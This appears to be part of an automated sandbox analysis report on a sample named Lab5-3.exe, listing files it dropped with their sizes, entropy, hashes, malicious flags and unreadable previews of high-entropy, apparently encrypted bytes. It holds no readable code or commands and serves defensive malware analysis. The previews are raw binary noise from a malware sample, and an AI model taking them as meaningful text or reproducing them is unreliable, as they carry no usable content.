                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:BKBdKS1ltnagkg/jrsvz78lDk903RP3rRxJ2wqSGF9wapuLMKKCtpZ/UCYUv0Cb:wCSvtagBI7710Vt2wqzrCPZsNUvtb
                                                                                                          MD5:28BEED06B6BBDAC110207A33B2EFEE15
                                                                                                          SHA1:16C4558AB9B3AEEBB882613B59627AEA2A1309B8
                                                                                                          SHA-256:3EB64C80EFE910857891C764AF03B0D8F87A34E8DA0456B56394A610D5BC2278
                                                                                                          SHA-512:CDCCA26E1F8BA44DD9EA91FDE3FE79EA09A11DCB18A10A811274D8BB7BB055D41F0902532360B441887EBE1C357B0CA4AD99A0711FDF5E693F5163F6DD043D05
                                                                                                          Malicious:false
                                                                                                          Preview:.......(...,.sz..z.e......2..T.].yyI.\..*JXS........D.\,:.....H!(U......._..k`k...-.(@...;.D.....P......Xw...EWf..(...S...W.(.9i..F.B<h....[..T......o+k.w...........t.}.:..1..UY..M...Q=^[Op....\.CW.P.J..........7...d5.../.......F\...F....M....?d.).4]..........:"..w,.A...9..oe...5:B.@..Vj*2....BQ<$.H.%..5...8..1....5...`..-..@.%{_...(.B.....T-.6..}^...V2C...u...]0`..>..........".z.'.I.Y...t3..(.....2}.b....).l...2..L5.G...>..P.>.w.]...y..P.u...n".Y...-..j..[v..ZZh...........:....m..r.}V...o@?+g....a.........>..y.G..2.K.WE...l..W6..;.....$..t...&#..t.....AI.U......(...PS..._.jg....B .@........Y...'gK.r...)."...*.........M*.m...:.......\b.+..._x~..7.s!.qM...c.bZ.i...'....:.bD..c..gg}\8.:.+.? &.7}.Xs@...[.Q..~..!..3WB.D.].;3...d.6..K.@.b...o3..&3....G....K.).$..,."e.@OpP....pV}3o....&......?...F...J........ .qm).8.H...`..Sv.n..V..c..EU6.&u...l.......b.m.O.@.$..ufT...P.. ..Cq...[..J.....4......Lb..'..0].t+..[,.z.....N......y.4.>.[o....T..J....J.......
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3584
                                                                                                          Entropy (8bit):7.94814347686386
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:ObAWrUFot1EyuGGwh+Yz6/V5FDk7Lc8GuGx0uKeY2ElUJ:uUuflGJYz6/O3cj90Cb
                                                                                                          MD5:5646ED5AE66A90543ED47BBB3E79CC0B
                                                                                                          SHA1:F51ABDABC1A6C6B69EF737F05C3DFB4A305FB5CD
                                                                                                          SHA-256:B1BC836D9155BE6E408CD03CCD1CBB271921D9C49471DE8C908208DE71752985
                                                                                                          SHA-512:0D2F634E68E9873183F999B674DB462B9231B1EDC19A975282FAD52314F20F0C5E1BF6857EBA364BD65F4583C0F96FE6E1D10C9E9640AAA1E51A01293D816291
                                                                                                          Malicious:false
                                                                                                          Preview:..P..F.....t......).Ny..y.Jo.E..DiN..O.1..;.(.....1.]l...Ta..7{..$.]{..n..&..U?.pZ.{...x.-.0..'.5..].B<,...7e=&.C.r.Ev.w..c...!.$..A@.... .x-........MU.a.|j4t...MB.c........4.Qi/~....s....`.8z<.` 8.l...(1S?N..*......S.i...........v.s.../.......ta-c..5.A.j;!....Q..\d".t..e,../f..92.S/.LB.<v..............J...+{..%...:...I.Y...x..]K...TA,.?.B|....T..N.u.r.]hl.V;.<...v\..n...5...\.+."..K.Df..K*.......,9|..?.L.v..t.....Rb....!e...#.5..t"..)......39.!.......5..$.^P........Mba...C.....Y.....[..z?.#M<.......(.,..|..i.0...E9w....?..(....I...>..,.*........eEap.I.`.yfV.SLs....'.\...lG...:.r.L...l..!..}.5J.I.q....Z...V.......,...}>Z..B...5.Yi...S..|.W,Q..1Rc..|Z%.R.V...S.......h|..#...#8j.h......>%_.~...$]..'..M...Q.]......S.o.4.Tv.-a..@..n..\........,.C...(J.....k.}..{aRLD/TYUy..o....L.L....bp..<...hA..PW.Q.dTE.....%..540.'1DXrR.i..lxLL6_..2.R....[O-o"..z...y......c..k..T..c..[......u.. ..F...>1h.!...8P...(N.1.r!...p.2....2Yij............$..v
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):12608
                                                                                                          Entropy (8bit):7.986546884370771
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:4i8X6Nj3oDpp4+1uyHjL4p1KCUrO3LJnxUF8hJdwGpd8z7AbEvIyAi50Cb:c6NjC70BUrSqFuww62JyAUtb
                                                                                                          MD5:FDCC777588C400D79656C7EE0ECA39BE
                                                                                                          SHA1:49E2D63F43A95EC641EDC02CFB66E63175826E15
                                                                                                          SHA-256:80D26EDD99169F7FF265B876C42358768347483F80E5EEE4FF3CBE30F35AE2A9
                                                                                                          SHA-512:C80E5B75CD73BD4353E212CDF0B4FFE9E0671BEF1525FFA21C1F1BB64EF5859562CFEF1296AF6BC3227663B019D56E61EB11BC28F874B60BD8F7069ED8E4B813
                                                                                                          Malicious:false
                                                                                                          Preview:... .....RE...,m.A...qo.|..Iq.j.a\._...W..\}.....Y_...D."..r....w1...h.....;`\..q=~.._..|...y...../...&j6_...z.Z#+...'..n."....G..z.nH..l.Y).L...7..-..%..c..B.~.c.K.kn..y3...G..T..W?.<........x..4..Z.[....4....EF".,.moW.>L\."H..H.U..|.b.8..a.Ad...b{.e.kWL...2b.#....Y..#.....RO#,5...@#.u.ide.N....4...0......v.9.q....P?.....z.%.... %.o.6.@P..i..........S.iC&.'n..&f.\....5.1.)U^...9>.2Q.....O..kj............S..+)...2.".NO..q.E7..{|.%...&.2.h....=.......yny=..,.i...F...w.._.?|..%t.TGcKE... .V..4....p.|L.O...w..r...w.`v.Dc...}0.j...=q..<.K.T....F.#.sS.N...Aa..6.|B...:.q>l.YF.!.eu.2G..f.o.U...Rl<l...j..r.v...#..XK... A.n..fB..x.:.....h.4.qM;...$L$v.55*%.]~....K_.k...c.....d..c..'~'..'F.3 ..L.....oc.G3.: l..O}.... P....$.a.kb.(I...j.~Ey.....mP...........8;(.........}..Q3p.Nv|C.... .0U.6....Ui...2._D.N.......{rd.V..%...q..c.0IX...EO....h.1G2+..q.7.t..p._..;..1...i.m8.".7.O..K..._..A.]...z..d...%.+.%.&.....!..X.X...>B..>....=.....j...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1904
                                                                                                          Entropy (8bit):7.911309021388365
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:uMvFF1VlyWiuNp2HfUTid3hBaUoSGFcmeykEdEElU92i:uuFHzGCpJGx0uKeY2ElUJ
                                                                                                          MD5:09363A4006BC1E8FAF421DBB75486049
                                                                                                          SHA1:A353A2225F06B94048DCBC3A42143D84C4B0AADE
                                                                                                          SHA-256:6749A04F80C326B9C25784EF468E70055C4BBB2A7217ED2ADC93AC3F21121273
                                                                                                          SHA-512:4EBD8E07335AAE27B5B08CD6AD93827579212636AD4DF1A2E84392DC2611099E67355716FA5EB9162C10C48F4027E55725C993F34429D4EFB5030C5E67C89670
                                                                                                          Malicious:false
                                                                                                          Preview:7..{.U.....?O....>`.;......=e...g!.Ful..sE...._Q.Hbc.`.Q5.n.=tr......er....!...6Y....@...ht>.(].+.L..fsp.C......,{..Nl3.^..+..U.x\M......W.E&..c....42..]..H5.u `.........\`......!...*..z@..!..Q..........V..zx...h....a...6......7..oj.......E..[.&.O~.......up...1...K...u.."...lv.fE...k.;L.}~...j3. 2v.6..F-b.Z...H..0..y.....a./hjV........z..k^+G...ds..^8...&I...B..n..[..Y...}..yk....*..{.t.......B....Q<..m.U^'.S...Z.Y.i..a.:.8.z.3-....8.s.qZ...}.GJ.N..a....m.%.2.k....k.p[..Uc>. ..6.we..!...h...F/8OP.brB....M...e.n.....Ta.......\d..5E_s".^(oO..G.q...0./......w......f..h)..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):30032
                                                                                                          Entropy (8bit):7.994217016322814
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:/KgzGwJVpihSknjoIr7Ygvm1hnbg2KbjmOKitsdy2vTa4Z:/jMSlIrEgvu5bdUjmO1mE2vPZ
                                                                                                          MD5:685191A3683BE18EF9BD667074F94869
                                                                                                          SHA1:5EF298E982FC42F569F8F8C8982B1C59831E5207
                                                                                                          SHA-256:42DCBACE7AA340716D37A4E4A2699E633B68093CA41741693821C859AC4CE483
                                                                                                          SHA-512:E4DC36FCFF559E02ED4127BD99E533DCF8FA32FD6B01F7122B5FAE4E70EB466CDD6B018369F11DC251F4212870C33892C61149014B0D7696462DA469A13F8799
                                                                                                          Malicious:true
                                                                                                          Preview:TV.R.q&.y...!s...r.#p..z.......:.:...Qy5..t.."(I..y...X....,..........E$....<.sQ.-Z~^.#O.......D?!^e.....#:..^......._.n.fPpD.Q....Xxv.xo.k.....Iz.6...Gh.a..z...g...XM.G2M........w.....".;.r..i!..M.......*".}..R/....D..W..H...2.u@r..g..j....r.=.....3..................P...._...-...Z.r|s-.y}.s...Hc.p..l..aI...Ys$.t..A.n...,i.Z.\.....vf..3h.~F.O....-...P...l:....b.JTK...Y.$C..S.WL..j$...~j..D...w&.c;? ....j..&K..4J.. .....h..6}..Y.&....`]X.40..v.......Y...a.,..l.......R7.le@.8.....f..L..n....`.i.W.d4.7w..9$.8KK..i0j.A*.....=....I...<.-.../b.G|..z.......|nH9N^..A..,/PME....N\...z..Vx.0..<..@...D..........C:qU......o.L./.T%..5_.... .t..!.....c.O.d..;8.Oh....M.j.$V'J..n..8.T..:.S.J5.).guX>.`...]...zD~$..]YFl....W=.!Q4...y.[*..%.l.<u.......T.;"...o..`..6.t 7.kMD.9v.. Sk..G..W.t.........F_.S.Pi...H..oT.k.L.._i.Z.c.F..C.st.,.}.......<.......m..A(...N...![.bu0...X..........e.h.f@a./"..!.._N'M......JK..R....A...!._z8n...W..$.....v.fs..x.|q...%.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):12608
                                                                                                          Entropy (8bit):7.985417155472045
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:XqYKhwLkzTn5H5mQLj7W+HISM/KWg9kZ2tb:Xqll5PL/WyMZ/sZ
                                                                                                          MD5:DC08EB2D9B429E1B091B3464498D119A
                                                                                                          SHA1:C2302353BC58528D4474BC9D3B832DAC1D135DDA
                                                                                                          SHA-256:2234891C68AABB959CC776E2E9F82B36D356CA8309B61A57DDC09F1A07800E4E
                                                                                                          SHA-512:3D4CEE35C171DCE3E2C173B558399A688BCC7BD2A57CFB47917160AA967C9C8A26CA8E91B01CFC4E38D03A90FE0563AE5466B342FFC3BF236B5AF40B2EF7BCBE
                                                                                                          Malicious:false
                                                                                                          Preview:"....~)-;G..l`..[N\..h.........M.......CSV....sm..(ev...^M.dn.A.j6.u..[.g... }...h6../..A...J.p.... .....3R.p....F.[X.8..S-../..........|I.p..7..X...VB*.)...S..B..Z.M.U~.x\..2t.....$.X.Pc.?..O....b..$......xk.~t...G...q..1.....>../.e.?"...J...}.......`...L.Qw..`..;............u....I......RJ...`.......g<.w....gv!..W{....=..?..e.....^._N> &....P....3......p....^.Mq.'..(-.H72A1q.r.....i'.Q/..J...)...4m..e.>...d+....5.l..$u."...n.....s-...[.7.~^/.fN>..!U.'..1m)+....HM?$.TK...`j...{.(....................Bg4 ...V.UV.4.>.4.(.2.O...u.......CX#S...SD..3$.'y.(z?B..8.....:.."-...R.;.x.|..@..m..X./.H"...N.....7.h..J.$@Q%.`.V..".v....<...3..P._...H.g..O....}.\*.[.-.*..Tf.k..km]....xi.v2Y....... }.F.=8*&...^..S..~.F..7.J...T.(.Qp.....W.........%. .-@.K....y...\..N'..F...9.V..W/.8.^~A..{F7.Ns......Y}...7.......S.G.<.fJ1..#....r.(..l........Rk......M-kK...y...P.!~7.|.2...N..(Y.'.'dC..|s6..'?.D.".%.[.....V._F).R...4..$..k\...T.#..3..G?.......:h4i^L.C).
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):50864
                                                                                                          Entropy (8bit):7.996652414109419
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:DRrLBZZT9R7yf3lXpP0y3PrmG0M3GlGBeDyrTaJzWLUKD0zJG1/pNDcTMn7JsBhZ:ZFTcdh0av0KGlG4DyrUKyJGZpNDh7QZ
                                                                                                          MD5:D9423B2B7E5289878C410308D6A11F02
                                                                                                          SHA1:153E4BF2ED9D82D107EA730466322391D23E218C
                                                                                                          SHA-256:47660790E046CFA660A773D71545BA9A7662BDD794EAB96915C18F4A0079A20A
                                                                                                          SHA-512:9D982DC550B1AD1D623D688B89BE2CEC8BB53947E5996DB730C09FA01C9A5578A0A7ED02095996EC529E4EE4FAA144805BBFCF4E5C169C5374E9257186943E1A
                                                                                                          Malicious:true
                                                                                                          Preview:M.{..Rd.TQ..,Oltj......x7N"._..x%|qW.+..'...5.D.........3.E.._........m7.....................u....66G.....C......J...X.3..X.6I..`.8..[...-.d.... .[~.i.p....O.F._........WK...2J.$Lp........c....;.:X]....$.u.?.TT...........f.%.;.-....R.{=..ai8\Qy.R....)8C..*.n..C.\.3..<......y ..4..v.3._..r...@.5.q......gN\........c.l..z.."Qj....=p .Mu30.t\..i\z.~..]....<P..y.]..........$..o.1.. i...r....GF..._.....89g...m..J.....i.........+`.^....B..E...Y....`.aa ..^.u.}/.....9.l.XBP.`.12.G.....H..l.;Z.....R..N7..JlVq0T}..1...6....S...M.4.......T..R..dD...a(.&..t.S..f..(]1J..).>}|0h..4....U[..Gf.d...y.......I...\e.q......-.G#R....n.7:=>.(.9J.R..7m.z..9>E..k..Q..A.=.....lj....uW-r.6....=.f.._?..>....;..kW.D.$(8C.e....;.,m.K.B.#..G9D8..].:..Q....BO.5 ..p0..]5.)...=.S..........H._+...n...G.?*.B....H...-.Z..d-. .;......$....'!H;....;.._.H.&..i.... ...R..0.Q.$.D).t..k&X...mFQ ..O}8h..=....f.N.><..k..x....K..Xv.H.Q.^s....q..{wm..l..(Ap.$.(..!"}}Xu.M..(Dw.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):14464
                                                                                                          Entropy (8bit):7.987647979857617
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:RnjM73XKwLHISN1V25D7S3nQF74F9tNh1ugc34RbFH1tb:RnaHKGV25D76Q5GNagc85H1Z
                                                                                                          MD5:9BC9C1953F36E4AEF5B3177A7ECEEB94
                                                                                                          SHA1:8A2B2946AC77DD63820CD482B77B99673F6126F0
                                                                                                          SHA-256:92FD2721D2755E8DCE25CD902B3352DD614527C1F0780A64F4F5AA8898A21ED2
                                                                                                          SHA-512:03478E3B497239B28F36C0B7A4ADFE26E9F991D95596D0FFEDF492FC204D7E38F49FB5CD4ECC3B930722B9AEF665E97844795A8DF0D813217349A76004A7A029
                                                                                                          Malicious:false
                                                                                                          Preview:.\Xv..[.M..S;......DB.#...k.C.7...4c%.T..j...`...Wl....4......[4.U..An....3.+.^.`.}^...F..t...U.V`.e.7.pA.U..Bv..D...l...4...U...Y.f.Z.........D....K.P..z...p...$..[u..Gr..IJ.F.#.U.-2.]o.q9..j..b....(.../.......&iv.Y|.u.a..]k..J...S..1\.....nO..4..C...S.s.[...E....."...d2....%....A">..g:.K..?..H.k.....0.5..z.{jg*..Q.h..WU...{.!.K...a.2.k....~.v.....J.j.l....e@..Dk..pM.........F@R)P....:.K...#...|Z....Q.C.N...sqb.(..f.'e.J.4y..).5.>NlAA2.8h...*.5.N.cW.B....j.$...Z`x.........2$%|}u..9...~.......p.s,9.7......kR...:s@........C...kp..hp`...e..kw...s.%..@.-.u{.......&....l..v...[c.. ......,..pM...U.vl......U........:?.v...`...L....."CB....d......$..5Z.....k&..jT..$....Yd.....`..W...Be..._..=+..>...>...W}}.6. 8[.T.....H..ac&...;....=.....%C..q..~G.[..k../m.-m...W...>6.d......SJ.5...'.%.g.m..fq.+.L.$...n..A....AH.,..j..R...SP.V.|...C...##..A......n^.....# ......]'Vt....r'.....*...+.j......?...'S.......G...8....Gj..S_;M.Y.?.9...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):12640
                                                                                                          Entropy (8bit):7.987544663373633
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:sayNe2tB98d+1Pglh96urFtr5F/rsP0tb:sakNtB+TvYP0Z
                                                                                                          MD5:4B6F4B524B2504D7960A1C3A2C61AC4A
                                                                                                          SHA1:4624894B296A09E67D9F0894248BA1058F4F0C5A
                                                                                                          SHA-256:C5EEE52A61A98EA626214F42EB69F8FB870408914B9A99E17518D56BBA3500D5
                                                                                                          SHA-512:7C2B5254BABC238119142EB477119FCBF8D9EC60E0877BB6F78368E272608F79908CD49168C279C3DB88D3A5F0C4A12876A50912ECBA89CDB3B54ECD9388EDB0
                                                                                                          Malicious:false
                                                                                                          Preview:..EV.j.....:.|...Rvk.....r......h,*..}.....5.W.:W......ld=.l.QY.".....<f{..r..x.5.......)...S...a..'L..@..).....OD1..:..{s.....^b.X@$....#C(;.>.6[5dsS~..*...h.3...}..4..2....K).F..O.. O..&.........Ff.....M......|....$_..1".(.xg}..T,..k.}p,>TP.t.......}..15.u.+W;.>.Q...y9....n.B.......2OVS...B.l.%}=L....uJ.../2..^.H..l.5..F..>\p.\.....=......s.........J7.8.....\vv.......g.qH.0.L/.a.}.D...8&r..u"\.K...QC.].._C.......E..g..r..k/.7.....L.{....?...Aw.(.^...I.6.+.z_.ZG.z//S:?.lX25b.0qE...%.%C.wM......_.1N..x..X....A'A9e+F....i..%;.+HA.]+.>...og......`./6..>...*L.p..Y.R.H..fg..;....W..."..$.y..^.......XZ..I...v.sga..RXsp.Qnb<~d..YG........W........J...I0F......\M..s.R...%.=E..@....%RL......<..c0e.[.......bCr...Eit....n.x...v.J.......R..{...d...$.`..f95.c.JR.+.O7.x.#.......D.rw.....#..F)x&..1.*Mi.e1.p?...I...|H.}..q.y.a.s..Iv.O..B....g..9U..2*.2.|...9..K.s.......|K......(........Yj4.^..<./..U..b..............._. .r.I....._....<..+..E.....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):35360
                                                                                                          Entropy (8bit):7.994247462430138
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:bcU3EFdAVj8lljEMAqxjU/KMIqxo9oLLB9dWysyDgeOCscVsSMa9VHDZBbZ:gU3EFdAVQlNEMAqxY/0m0+F4YBsS3HZ
                                                                                                          MD5:84B0D530520B8C30633266BD204772F8
                                                                                                          SHA1:AEF704710CB93D1068588A79DC979D91D30CD9C8
                                                                                                          SHA-256:154DA41CF8679524919831E9D864E041BAB17486DC2B0E0D56179637DA522E2A
                                                                                                          SHA-512:8144B4B6E81BFA0C7CCFC2FA7D92DE73C5F80D2AEB6E8CA658677F2DDEE43EBD47801A417FDD0104361829FFC73EF88019FB374605D1F90ABB47F3273DFBE936
                                                                                                          Malicious:true
                                                                                                          Preview:..z81..B`..so..=..6a..X..j.\w<.9.]R..k_(.....@.=hEHb.]...].0q.......k...9.`/.....N.-a@......AT......6..\.t..p.... .m.[u]V.9F.;.|&N.q......D...%rP..@T&.x..g....N...\...W.c..SX..$]v....Md..e./..'*.:...S.......gK..%....3...ADiLY.h...u..4c'M....B.AG.....1..,R#I....^-..)."..`1@GA...&....i.hN........=..-...>....._..3..~.;...c6.............6z.i...PJ'./..eQ..&.......E....*,)...h..@.AKi...f.}b...uA.H....FB......q..p....l9.H.........|.Q.{r3@..8.t.a.T`....4:.X..)0..s.......ym.fa...b.+....gY..v<..>.p.Y.}.....Gi...Z.Y.!....T..;IQ..X...s..a.9...."........|...8.....bl.4E..\.Pd....../q(.y.p0.2...>\'.m....XU.5B5...&........r..%U.t.L...X...~>.hl.'E/BxgH|[.....>y.~j......[g.......A.Bs.(v.R.?o#,...d......6...)..6zRl.^....3.p......O.j.....`h...f..5n..)2Hk........g.9..t.N...F...J)G...k\.......>@Go1_..Q.....H.Z...l.W..Q..d]...%.f|.-*...K...O.. ...3{.f.9...E^G.R.k;h..$.K.e.1...\...(.Qs.. c.c..... .p7.;.3.(..)...L..g...'`.C......N.v.8._.5~>....{.$...So.+MGS......
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4096
                                                                                                          Entropy (8bit):7.951153661568087
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:3tmYGGx3s7kDCbsgHrr2khO/RGRRFveIGx0uKeY2ElUJ:9mYn3sADCo22khCyEr0Cb
                                                                                                          MD5:51BD3991C75844873F754B6758F90356
                                                                                                          SHA1:E3E6EB7C5F3B3FEB403D71B30621B24048DFD600
                                                                                                          SHA-256:6F3A3C9905D36BBBD890C7F4DD3A1D7C1121E310078F3FF9CAD7A3FE8B772203
                                                                                                          SHA-512:28BE81A8B89CD0F8410CFE236EB5F281F3F94F52618A7F411C798007D939E81938EA1F109E6A1964D3615DC2225731DF5F2022B202C4D5BB5AEB81E11C67C4BF
                                                                                                          Malicious:false
                                                                                                          Preview:rW....=.'..!nJ.pJ.....e....E.t4k..^y.*.|..TF...p[..E.[...,.\`.Q.H..z...!.,!.j.p)......{.............L.3V*m........o.1.lgK...1,%.we..2..{d.I....<j...'?q...`Jd{O.rr.v..O.6@4....j/..T..).IU....C/..2....}...}..g..e..a..yo.\a.wr....0c.^.).-8y..f tAe....!.....R. #..B.F...l.....:^..W}..$55..U.dtj1.r.zGX..Y.d.C..b....L.Bq.....S.............2...A.....oc5(a.1.....0...6k......(.e..Q..^.d.0..~.C.a!?........S(M..e{...d......B........fDg.0...S..`AO...H...........K..u..c....V...n.vLLx.....S.Dp.3.6.....@....)..+...Btw......b.r.O.G.........Xu...|.........].....<...Wz%5...k`i..}..df../r~....{j..P.....d].03k....&..0..l...@.^.K9......$s.,.h.Q.......+....N....]...6$...Bo.......o._f.a8..#..qB[1"..7i.......}.+!.e.L[...j..x!s..d...T%........A........D..:........I.....U.|....3.....x".W...h.A/....u.U.....j.f........n...m.P.`..d}tl/..~^..4[....<.S!.%...gL....gROn..|.c........q....5d....WZ6..=..1w....."d..Vg.9Z>...[...7..}~$.[p...j.&.0Q.E'.....F.+......K.,.WL...&.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):12816
                                                                                                          Entropy (8bit):7.984087141291373
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:NjhGHqyrTQg+C/nLrbPR47cLSbu0ySCUh/qREDvvEDtb:NjhGdrTQgLLHPOALSbJeEDvMDZ
                                                                                                          MD5:9156C3E9BD44D2555FF7BF6F5FFF8A00
                                                                                                          SHA1:A13BEFC09492E29A6544835DF117549EB759B1FE
                                                                                                          SHA-256:F2B9FC80AA6F1A49C2AC9C32D9D3F0442B5D8DDBCB290038B01FEB1A58A9F222
                                                                                                          SHA-512:36E871639121AEF45D393975C6F051BF3497D7F4B5B73A8C78FAF2171719D9931C7EF93CD028913D04E0498BA14A1F5DED0A0597EB170BB575970A5B71CE8D5B
                                                                                                          Malicious:false
                                                                                                          Preview:.....$.$PB.y]. .o4Q....:..Z.R...8..0.....3J..P|...P<8j...6H*Zm.....-q0&..p<.hr....J..$1..........H..M....".?..ejmv...B........P.m.d]../T.x.\%.b:.<.5.U.@..s.R.k}..QS....c.N.P.:6...]..~..~..C.ia...Pn....Y\~B.,S.^h.F.....X.A..0`..K...S.Qpf...'...z{z.-.*..MR;.P1N.L..1....?.......22Z.(.5%>0.!?.Q$..I 2<|.)....~...k..i=.........r^.yU.....}.ar....{%...S....I...F....!I..@&..T<P.2..Xb.....5|u.G.$.h~7..lNGU._...[.Q...%....k..L .:.^'.y.9.9i.Z....2...g....p...]M\H!...f..Tq>......].......~...\......52...qT.@.D .....1-.S.].....k.+...+.%.FM..q,.B:...#<F..r.I..t.../,......(..@...#n1...............l.....'.s...[..u..ZW/...,.k....gs9T...BZq$T....T./.....Q..$..m.`,.._..LO..7.....{.Mq.......V....H..2'..t..q.,&.f.".TRP.s..,8..{.x....=.......~WHV.Dp............j...z..$..8o.12.V(...Z.d....?.....k..5Jb.7~..@...qK:..R.gv5.'.pl......2.1l.~..$..."..(R...<.^......[......,....N=.C.s.H.2=x......=.C..F9V.........qDL..'s\~~.......Np.ouJT....P._c.`.d&..U].Pu.....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1904
                                                                                                          Entropy (8bit):7.90200828405331
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:6hZ2GcwNwzUWrHfUTid3hBaUoSGFcmeykEdEElU92i:6CGizuGx0uKeY2ElUJ
                                                                                                          MD5:30037FEA37FC76E5E9FED4DF96436D00
                                                                                                          SHA1:BF7E7FD44BB8D6B3C279EDDED88413FEC58D5634
                                                                                                          SHA-256:683E08B259BD7AEF434029ACB4EF2C14CB942BF7BB66BC4D591138DE58FDB902
                                                                                                          SHA-512:FB5F78F2771F231194B58F1DFA80279317748EB5A233FC9810861BDBDE8CEBAB008EC8F09DE6F2AD07E3976B028F962BAF1A4A09047C6F95DF9C717E7FEFFD96
                                                                                                          Malicious:false
                                                                                                          Preview:=Rg..}.(+.,..).....p .M..).y......&...^jB..#D~l|q\{....];..W..XV.{.~....=/Q..s7_j~.......5...mFtX./.N4...q.<R>3.J..J.9"."Q.n."[.Mt .=...l......5"_Hp...^.`.2....'l...o#.Y...go |. F..=..w.T..j.....j0..E'./...'.'...c?..TT...4.ha..@f...L.y5.."\.|J.;..W.D4.$b.4|N..F.&..h....&..JT|.?.hEf.<.3...le3../....n.?....r.m9?G.M."NH.5pth...#..KW..=8[.i.<2..N`....&..,..I.......+.....w...._.E.|"...e.."...eA.x.T`..<......[:....+(.C..._...,....T...w..* ...-..?...{s.DqyB[3sS.6..)7..(/.......a.....o.aP+..e.....n3.....A.G%...`..G..+..v..tM&{0J...Ew..b&.q...D.s......@..\..(....1....y.:..'.\W}k..S..<.bu..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):8368
                                                                                                          Entropy (8bit):7.9784346741457295
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:QhcJy1XW+A6LlPQhO7LVd649ODaeiVxrDnLXlNDshTbWHWyh0Cb:dJevA6BUO7LVxODxoZzTlyFbvyhtb
                                                                                                          MD5:50B1F488DAAC8FF29551658611856B6F
                                                                                                          SHA1:32BA0979100C557523FCF328C4E4786E27F0CECC
                                                                                                          SHA-256:4155A0D615F5417E1443B9E592C22AC5194033791C3E96B4F0F62268E0813CE4
                                                                                                          SHA-512:E9557CC23EC7678F102A1BC226DB78CB40D4A2FA45E9FAC3D4605B68F02E25E2AD9EA397EA7BEFF5296D38A0139214347B9804086E021E2D0E1BABA28436A5F4
                                                                                                          Malicious:false
                                                                                                          Preview:....D.8...[.+.\...?..4WYS..t......i...x...,.6'..t;.V...LD....s..*;._.T.=.....n..9..".].d..J...E'V..#b=..).....Z...r#Q.N....,i..x.L......g..X.'xd[kUu.$..,..5....1...L<....&....-)..0$O........ 6.....H=o*.R=../H..^..~%'..l......N..P."{..2......(..........GfKx.Cu.O..=..Y.~C..B:....dK.r.'..].w..V..V.d..v.B..9.f....g.......\...".j..g.4.:>nqz..1..Wun...63...@t.'M.Z..@.1...J.S.....f....kN........s..'.....C.../....38.Y....`..x.qC..?_...6.%P..L.......(...].? .[..U./D....uF..\.O....>.?.]}^...._%.a.........Fw.w...'...j.K...F...q.7. $...(....<o....I.-.ei....4'L..O.....T.l#..s.Z....8..b....:...p,w.9..mG{.F...@..F..7.'.{W.JSJ.....j^.r...w}..8..m?.....R.Cr...;..5.[....*..X0..IE.>jv'..U.X.o^....."^Iv....d.....%B.&...5...n/.KU.7....}6....&y..d.R.nb.W..S..9%9...b.&?.`..Gl.k..%z[..)...P-K<.l.>.....G.4&)C.9.^W8.....0(.?by.9.6...`..'5.K.G..E..m.nV.h..o.$ ....Z.......6...IP.7....Su.$<}.....h..)k...yc..k.in..........Ep.'.y..3.'s.....[>...?/...F..
